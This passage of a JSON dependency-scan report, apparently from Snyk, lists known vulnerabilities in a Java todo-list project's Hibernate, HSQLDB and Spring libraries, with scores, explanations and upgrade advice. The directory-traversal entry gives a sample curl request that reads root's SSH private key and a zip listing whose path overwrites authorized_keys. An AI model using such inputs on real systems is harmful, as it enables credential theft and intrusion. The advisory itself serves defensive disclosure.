"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", - "epssDetails": { - "percentile": "0.61710", - "probability": "0.00232", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-10219" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-14T16:07:06.897969Z", - "functions_new": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-10-18T14:55:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-01-09T14:55:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.455389Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-validator@6.0.23.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "title": "Improper Output Neutralization for Logs", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Dennis Kennedy" - ], - "semver": { - "vulnerable": [ - "[5.3.0,5.3.12)", - "[,5.2.18)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.3.12", - "5.2.18" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", - "title": "Github Commit" - }, - { - "url": "https://pivotal.io/security/cve-2021-22096", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:20.847607Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:36.610042Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.086414Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", - "epssDetails": { - "percentile": "0.34533", - "probability": "0.00079", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22096" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-02T11:14:46.053186Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-10-27T12:52:59Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2021-10-27T16:55:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.086414Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "psytester" - ], - "semver": { - "vulnerable": [ - "[,5.2.19.RELEASE)", - "[5.3.0,5.3.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.19.RELEASE", - "5.3.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 4.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://pivotal.io/security/cve-2021-22060", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 4.3, - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:24.703024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:34.544783Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 4.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:10.667113Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Input Validation when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.2.19.RELEASE, 5.3.14 or higher.\n## References\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22060)\n", - "epssDetails": { - "percentile": "0.23203", - "probability": "0.00054", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-22060" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2022-01-06T12:31:26.181234Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-01-06T11:18:34Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2022-01-06T17:17:24.995166Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:10.667113Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/util/StringUtils.java", - "className": "StringUtils", - "functionName": "cleanPath" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-core", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16414", - "title": "GitHub Issue" - }, - { - "url": "https://jira.spring.io/browse/SPR-12354", - "title": "Jira Issue" - }, - { - "url": "http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html", - "title": "JVNDB" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578", - "title": "NVD" - }, - { - "url": "https://pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-3578", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1131882", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:25.325641Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:07.314890Z" - } - ], - "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Directory Traversal. It allows remote attackers to read arbitrary files via a crafted URL.\n\n## Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n## Remediation\nUpgrade `org.springframework:spring-core` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/e3e71ba92a8b82dadf474eda76cd2741f65a77a8)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f6fddeb6eb7da625fd711ab371ff16512f431e8d)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16414)\n- [Jira Issue](https://jira.spring.io/browse/SPR-12354)\n- [JVNDB](http://jvndb.jvn.jp/en/contents/2014/JVNDB-2014-000054.html)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3578)\n- [Pivotal Security](https://pivotal.io/security/cve-2014-3578)\n- [Pivotal Security](http://www.pivotal.io/security/cve-2014-3578)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1131882)\n", - "epssDetails": { - "percentile": "0.69801", - "probability": "0.00301", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3578" - ], - "CWE": [ - "CWE-22" - ] - }, - "packageName": "org.springframework:spring-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.465000Z", - "functions_new": [ - { - "version": [ - "[3.0.0.RELEASE, 3.2.9.RELEASE)", - "[4.0.0.RELEASE, 4.0.5.RELEASE)" - ], - "functionId": { - "className": "org.springframework.util.StringUtils", - "functionName": "cleanPath" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-09-05T17:16:58Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-core" - }, - "publicationTime": "2014-09-05T17:16:58Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:07.314890Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.springframework:spring-core", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "4ra1n" - ], - "semver": { - "vulnerable": [ - "[,5.2.20.RELEASE)", - "[5.3.0,5.3.17)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "5.2.20.RELEASE", - "5.3.17" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-expression", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28145", - "title": "GitHub Issue" - }, - { - "url": "https://pivotal.io/security/cve-2022-22950", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:01.573408Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:12.598178Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.044801Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", - "epssDetails": { - "percentile": "0.35300", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22950" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-expression", - "proprietary": false, - "creationTime": "2022-03-29T10:05:31.971026Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-03-29T09:51:43Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - 